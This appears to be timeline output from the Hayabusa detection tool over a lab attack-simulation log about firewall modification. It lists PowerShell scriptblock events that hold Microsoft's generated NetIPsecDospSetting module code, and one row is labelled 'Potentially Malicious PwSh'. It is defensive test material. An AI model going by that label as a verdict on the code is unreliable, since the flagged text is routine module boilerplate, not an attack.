Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function 
Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] 
